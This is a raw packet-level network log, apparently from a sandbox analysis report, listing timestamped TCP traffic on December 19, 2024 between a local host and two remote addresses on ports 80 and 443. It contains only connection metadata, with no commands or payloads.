                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.047537088 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.047545910 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.055778980 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.055859089 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.055867910 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.080251932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.080316067 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.080358028 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.080370903 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.080573082 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.080802917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.081043005 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.081054926 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.081088066 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.081088066 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.081473112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.081525087 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.081687927 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.081785917 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.081985950 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.081998110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.082010984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.082072020 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.082072020 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.082546949 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.082623005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.082786083 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.082798004 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.082853079 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.082890034 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.084777117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.084789038 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.084800959 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.084876060 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.084876060 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.085438013 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.085644960 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.087061882 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.087096930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.087145090 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.087145090 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.087794065 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.087829113 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.087951899 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.090069056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.090102911 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.090183020 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.090183020 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.090852022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.090887070 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.091075897 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.091730118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.091830969 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.092268944 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.092303991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.092334986 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.092339993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.092381954 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.092381954 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.094757080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.094793081 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.094826937 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.094829082 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.094882011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.094882011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.095663071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.095772982 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.097148895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.097182989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.097218037 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.097249031 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.097305059 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.097836018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.097871065 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.097903967 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.097913980 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.097955942 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.097955942 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.098419905 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.098638058 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.106280088 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.138586044 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.138739109 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.138748884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.138761044 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.138806105 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.138847113 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.139358997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.139512062 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.139524937 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.139556885 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.139575005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.139924049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.140096903 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.140182972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.140208006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.140258074 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.140553951 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.140635967 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.140659094 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.140672922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.140685081 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.140712023 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.140754938 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.140754938 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.141545057 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.141675949 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.141705036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.141781092 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.141974926 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.141985893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.141997099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.142113924 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.142414093 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.142432928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.142446041 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.142668962 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.143181086 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.143193960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.143204927 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.143237114 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.143281937 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.143927097 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.144007921 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.144031048 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.144042015 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.144054890 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.144107103 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.144124985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.144748926 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.144762993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.144773960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.144850969 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.144850969 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.145406961 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.145421028 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.145478964 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.145478964 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.145725012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.145768881 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.145781040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.145796061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.145814896 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.146501064 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.146512985 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.146523952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.146562099 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.146579981 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.147193909 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.147207022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.147253990 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.147677898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.147691011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.147701979 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.147742987 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.147840023 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.148303986 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.148315907 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.148377895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.148376942 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.148503065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.149085045 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.149111032 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.149159908 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.149159908 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.149353981 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.149365902 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.149378061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.149418116 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.149445057 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.150202036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.150239944 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.150278091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.150278091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.150404930 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.150906086 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.150918007 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.150928020 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.150974035 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.151029110 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.151628971 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.151642084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.151652098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.151664972 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.151756048 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.151756048 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.152596951 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.152609110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.152621031 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.152678013 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.152678013 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.153248072 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.153260946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.153271914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.153284073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.153352022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.153352022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.196573973 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.219857931 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.229410887 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.229496956 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.229587078 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.229617119 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.229770899 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.229862928 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.272942066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.273010015 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.273026943 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.273051977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.273073912 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.273098946 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.273562908 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.273621082 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.273720980 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.273734093 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.273775101 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.274178028 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.274225950 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.274324894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.274337053 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.274348974 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.274363041 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.274386883 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.275108099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.275154114 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.276941061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.276953936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.276966095 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.276982069 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.277008057 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.277708054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.277762890 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.279340029 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.279352903 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.279392958 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.280200005 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.280213118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.280261040 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.281579018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.281591892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.282157898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.282169104 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.282181025 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.282207966 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.283730984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.283771992 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.284535885 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.284548998 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.284560919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.284574032 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.284614086 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.286818027 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.286830902 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.286848068 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.286923885 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.287478924 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.289097071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.289109945 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.289120913 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.289172888 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.289200068 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.289768934 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.289781094 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.289792061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.289824963 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.289849043 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.290493965 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.290507078 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.290518045 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.290529966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.290555954 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.290580988 CET4974380192.168.2.431.41.244.11
